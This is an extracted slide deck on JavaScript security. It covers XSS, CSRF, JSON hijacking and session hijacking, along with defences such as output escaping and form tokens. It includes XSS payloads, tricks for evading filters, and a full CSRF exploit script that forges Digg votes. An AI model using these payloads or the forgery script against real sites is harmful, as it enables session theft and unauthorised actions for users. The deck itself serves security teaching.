This document summarizes security issues with JavaScript and discusses vulnerabilities like cross-site scripting (XSS) and cross-site request forgery (CSRF). It provides examples of how XSS can be used to steal cookies and hijack sessions. It also discusses challenges with securing JSON responses and preventing code injection attacks. Countermeasures discussed include escaping output, adding random tokens to forms, and using a secure comment syntax to wrap sensitive JSON responses.

1. JavaScript Security
jason harwig

2. quot;How dangerous could this silly little toy
scripting language running inside a browser be?quot;
Jeff Atwood
codinghorror.com
stackoverflow.com

3. “JavaScript's biggest weakness is that it is
not secure.”
douglas crockford

4. quot;.. nine out of 10 websites still have serious
vulnerabilities. . (XSS) as the top
vulnerability classquot;
WhiteHat Security Website Security Statistic Report

5. OWASP Top 10 2007
1. XSS 6. Information Leakage
2. Injection Flaws 7. Broken Auth
3. File Exec 8. Insecure Crypto
4. Direct Object 9. Insecure
Reference Communications
5. CSRF 10.Failure to restrict URL
access

6. browser limitations

7. javascript IO
• Ajax
• Image
• iFrame
• Source script
• Bridge to flash, Java applets

8. var xhr = new XmlHttpRequest();
xhr.open(...)

9. NIC Server Google
* get or post

10. var image = new Image();
image.src = url;
* can detect connection success failure

11. NIC Server Google
* get requests only | onload | onerror

12. f = document.createElement('iframe');
f.src = url;
document.body.appendChild(f);
* only if same domain

13. NIC Server Google
* get requests only

14. s = document.createElement('script');
s.type = 'text/javascript';
s.src= url;
document.body.appendChild(s);
* if JSON returned

15. NIC Server Google
* get requests only

16. f = document.createElement('form');
f.method = 'post';
...
f.submit();

17. NIC Server Google
* get or post

18. white hat
• Mashup / Aggregate content
• SSO Solutions
• Protect users / application integrity

19. black hat
• XSS
• CSRF
• JSON hi-jacking
• Cookie session hijacking
• Internal network scanning
• History checking

20. cross-site scripting

21. Browser IFrame
same origin policy

22. user input
escape it!

23. XSS Flavors
• Type 0 - DOM
• Type 1 - Non-Persistant
• Type 2 - Persistant

24. type 0
var p = location.href.params;
document.body.innerHTML = p

25. Type 1
Search: <script>alert('xss');</script>

26. Type 2
Please enter username: <script>alert('xss');</script>

27. <c:out value=quot;${var}quot;
Your Username: <script>alert('xss');</script>
escapeXml=quot;truequot;/>

28. html filtering

29. samy is my hero
from http://fast.info/myspace/

30. Friend Requests
7,000
5,250
3,500
1,750
0
12:34pm 1:30am 8:35am 9:30am 10:30am 1:30pm

31. tag/attribute whitelist
<div style=quot;background:url(
'javascript:alert('xss')'
)quot;>

32. 'javascript' stripped
<div style=quot;background:url(
'javanscript:alert('xss')'
)quot;>

33. quot; stripped
String.fromCharCode(34);

34. innerHTML stripped
eval('document.body.inne' + 'rHTML');

35. onreadystatechange stripped
eval('xmlhttp.onread'
+ 'ystatechange = callback');

36. to be continued..

37. alternatives to escaping?

38. google caja / ADsafe

39. attack vectors to prevent?

40. code evaluation
eval('alert(document.cookie)');
(new Function('alert(document.cookie)'))();

41. code eval continued
<iframe src=quot;java&#65533;script:alert('xss')quot;>
</iframe>

42. poluting global objects
try {
throw EvilArrayFunction;
} catch (Array) { }

43. xss lessons
• Escape XML

44. cross site request forgery
the new kid

45. NIC Server Google

46. Digg.com
• “digg” a story while logged in
• Cookie authentication
• known url, parameters

48. digg exploit code
mf = window.frames[quot;myframequot;];
html = '<form name=quot;diggformquot;
action=quot;http://digg.com/diginfullquot; method=quot;postquot;>';
html = html+'<input type=quot;textquot; name=quot;idquot; value=quot;367034quot;/>';
html = html+'<input type=quot;textquot; name=quot;orderchangequot; value=quot;2quot;/>';
html = html+'<input type=quot;textquot; name=quot;categoryquot; value=quot;0quot;/>';
html = html+'<input type=quot;textquot; name=quot;pagequot; value=quot;0quot;/>';
html = html+'<input type=quot;textquot; name=quot;tquot; value=quot;undefinedquot;/>';
html = html+'<input type=quot;textquot; name=quot;rowquot; value=quot;1quot;/>';
html = html+'</form>';
mf.document.body.innerHTML = html;
mf.document.diggform.submit();
from http://4diggers.blogspot.com/

49. Fixes?
• Referral checking?
• quick cookie expiration?
• post?

50. solved
session.setAttribute(quot;tokenquot;, token);
<input type=quot;hiddenquot; value=quot;${token}quot;/>

51. double submit cookie

52. digg link
<a href=quot;javascript:dig([num],[id],[digCheck])quot;>digg it</a>

53. digg submit js
new Ajax.Request(quot;/diginfullquot;,
{ quot;methodquot;: quot;postquot;,
quot;parametersquot;:
quot;id=quot; + itemd +
quot;&row=quot; + row +
quot;&digcheck=quot; + digcheck +
quot;&type=quot; + type +
quot;&loc=quot; + pagetype
});

54. no diggcheck, no digg

55. digg.com
• Added random hash as post parameter
• server verifies request

56. myspace
• used hash in post to add friends
• XSS vulnerable so the hash could be retrieved

57. HDIV
• HTTP Data Integrity Validator

58. rsnake joins twitter

61. crossdomain.xml
<?xml version=quot;1.0quot; encoding=quot;UTF-8quot;?>
<cross-domain-policy xmlns:xsi=quot;http://www.w3.org/2001/
XMLSchema-instancequot; xsi:noNamespaceSchemaLocation=quot;http://
www.adobe.com/xml/schemas/PolicyFile.xsdquot;>
<allow-access-from domain=quot;*.twitter.comquot; />
<site-control permitted-cross-domain-policies=quot;master-onlyquot;/>
<allow-http-request-headers-from domain=quot;*.twitter.comquot;
headers=quot;*quot; secure=quot;truequot;/>
</cross-domain-policy>

62. http://www.yourminis.com/search_minis.aspx?q=XSS

63. stealing your gmail contacts

64. google contacts url
contacts?out=js&callback=google

65. responseText
google ({
Success: true,
Errors: [],
Body: {
Contacts: [
{ id, email, etc. }
]
}
});

66. google’s solution?
• responseXml

67. lessons
• Protect high value forms
• CANNOT be stopped if site is vulnerable to
XSS

68. json hijacking

69. new Ajax.Request('secretStuff', {
onSuccess: doWork
});
// server responds with
[
{ sensitive_info: '...' },
{ sensitive_info: '...' }
]

70. So how do I do it?
• Override Array
• Source script

71. demo

72. solved
/*-secure-
[
{ sensitive_info: '...' },
{ sensitive_info: '...' }
]
*/

73. “solved” continued
• protect JSON services behind post

74. lessons
• Many experts recommend JSON services
shouldn’t serve sensitive data
• use secure comment
• responseXml as alternative

75. Session hijacking

76. demo

77. internal network penetration

78. history hijack

79. demo

80. resources
quot;Security Now! Podcastquot; quot;Fortifyquot;
twit.tv/sn fortifysoftware.com/security-
resources/
quot;WhiteHat Securityquot;
whitehatsec.com quot;XSS Generatorquot;
ha.ckers.org/xss.html
quot;Jeremiah Grossman Blogquot;
jeremiahgrossman.blogspot.com quot;Samy is my Heroquot;
fast.info/myspace
quot;Digg Hackquot;
4diggers.blogspot.com quot;HDIVquot;
hdiv.org

81. twitter: jharwig
jason.harwig@nearinfinity.com
nearinfinity.com/blogs
careers@nearinfinity.com
81